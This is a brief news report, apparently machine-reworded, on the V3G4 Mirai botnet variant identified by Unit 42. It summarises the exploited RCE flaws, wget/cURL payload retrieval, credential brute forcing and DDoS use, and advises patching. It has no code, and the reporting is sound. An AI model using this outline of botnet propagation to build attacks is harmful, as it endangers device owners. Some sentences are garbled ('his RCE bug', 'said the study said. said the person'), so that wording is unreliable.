A new variant of the infamous Mirai botnet has been discovered using several security vulnerabilities to spread across Linux and IoT devices.
New version observed late 2022 dubbed V3G4 Palo Alto Networks Unit 42 identified three different campaigns likely run by the same threat actor.
“Once a vulnerable device is compromised, it becomes part of a botnet that is fully controlled by the attacker,” said Unit 42 researchers. “Threat actors have the ability to leverage these devices to carry out further attacks, such as distributed denial of service (DDoS) attacks.”
Attacks primarily identify exposed servers and network devices running Linux, with attackers arming themselves with 13 flaws that can lead to remote code execution (RCE).
Some of the notable flaws are related to critical flaws such as Atlassian Confluence Server and Data Center, DrayTek Vigor routers, Airspan AirSpot, and Geutebruck IP cameras. The oldest flaw in the list is CVE-2012-4869, his RCE bug in FreePBX.
A successful compromise retrieves the botnet payload from a remote server using the wget and cURL utilities.
The botnet not only checks to see if it is already running on the infected machine, but also takes steps to terminate other competing botnets such as Mozi, Okami and Yakuza.
V3G4 also packs a set of default or weak login credentials that it uses to brute force via Telnet/SSH and spread to other machines.
It also establishes connections with command and control servers that wait for commands to launch DDoS attacks against targets over UDP, TCP, and HTTP protocols.
“While the vulnerability described above has less attack complexity than previously observed variants, it still maintains a significant security impact that could lead to remote code execution,” the study said. said the person.
To stop such attacks, we recommend applying the necessary patches and updates as they become available and protecting your device with a strong password.
